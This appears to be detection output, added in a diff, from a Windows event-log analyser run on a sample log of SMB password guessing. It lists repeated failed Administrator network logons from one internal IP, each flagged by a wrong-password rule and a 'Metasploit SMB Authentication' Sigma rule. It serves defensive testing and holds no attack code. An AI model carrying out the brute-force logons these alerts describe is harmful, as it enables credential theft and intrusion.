+2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yil94cFkU6UP24SK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bkdVHF3vggCcuNdn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4dRRI2CS3aVIX4nX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: chDZq3VgxIE2mRb9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HLVvgMmqLXKZADON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i4avO2AJSlNb0IUL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mdo5CvycGvGhn33y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: heJfjLl1vbX6lMjZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wOP1E6hd4Jtj4gob  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xa7kMCNz0bEGTBqX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HSxTQ4HsZt2DeYVe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YxHpSQwFSV4hveVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n3OwzSPomxZLoCe6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e9IfwDZIfYT6A50K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOf6DbRX4zlNqLdb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 00kXrnJNH40NyoYL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nsNHcb9pnpdRgeL7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucMhgxMXy9Ch1jNm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cfi3ZaLTECJgjM9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: usugjEEBHlhJvOyu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WQ1pM2CVLt5ITVD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NIboW7hNljF3HPpk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rOk5W4rkSYRRw4xS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJTfcwd8rnFc06iF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6sm415W5zkvjdnTV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KEiSbtlmW4ou1mc7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xWeZV5pHt94adwUy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5np7HeCPAFTDdTXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gXbe2jEJVtwaQXlr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7hZFiUCJnaBdHcw4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a71wyo41KV1ZoT7p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogB17WdeOiC19rqn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ANOLPWG12lkW39Ei  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y1vf7OUxb6TH3Q4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bxU5yumSieUzSgzH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9K5EoWWASU8SlSe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PwZLRPFxaFWwjZEe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8fXgFFb3HTMunsoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R1RozAr1uhux4cYW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n7EmuUSv03RnhKsF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jw410HEW8EC3MC9f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UTYp8cEbt3Yggo3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWJVzgYLWIo7SGCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DP13jPdW5Gdl8z56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LNXOWjHmMDhfFVon  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kka1RiF3f7Nhkf8x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
